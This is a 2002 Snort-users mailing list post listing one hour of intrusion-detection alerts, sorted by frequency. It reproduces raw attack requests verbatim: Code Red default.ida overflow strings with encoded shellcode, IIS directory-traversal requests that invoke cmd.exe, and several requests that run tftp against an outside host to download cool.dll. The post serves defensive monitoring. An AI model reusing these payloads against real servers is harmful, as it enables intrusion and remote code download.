Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re-affermentain, Opps, I mean re-affirmation of the morons on the net

From: Phil Wood <cpw () lanl gov>
Date: Sat, 9 Feb 2002 20:32:00 -0700
56 minutes of snort web rules alerts starting Sat Feb  9 18:52:57 MST.
The leading number is frequency. (sort file | uniq -c | sort -rn).
Check out the moron that is going to pull down cool.dll.
(No, this was not captured on my home machine.)

   6244 GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   4999 GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   2514 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
   1303 GET /scripts/root.exe?/c+dir HTTP/1.0
   1290 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1286 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1279 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1268 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1259 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
   1237 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   1233 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1228 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
     40 GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll 
HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll 
HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll 
HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      2 GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
      1 GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
      1 GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 
\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 
e:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 
\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 
d:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 
\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 
c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll 
HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET 
cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET 
cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET 
cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll 
c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      1 GET /default.ida?
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c

Now for another beer.

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: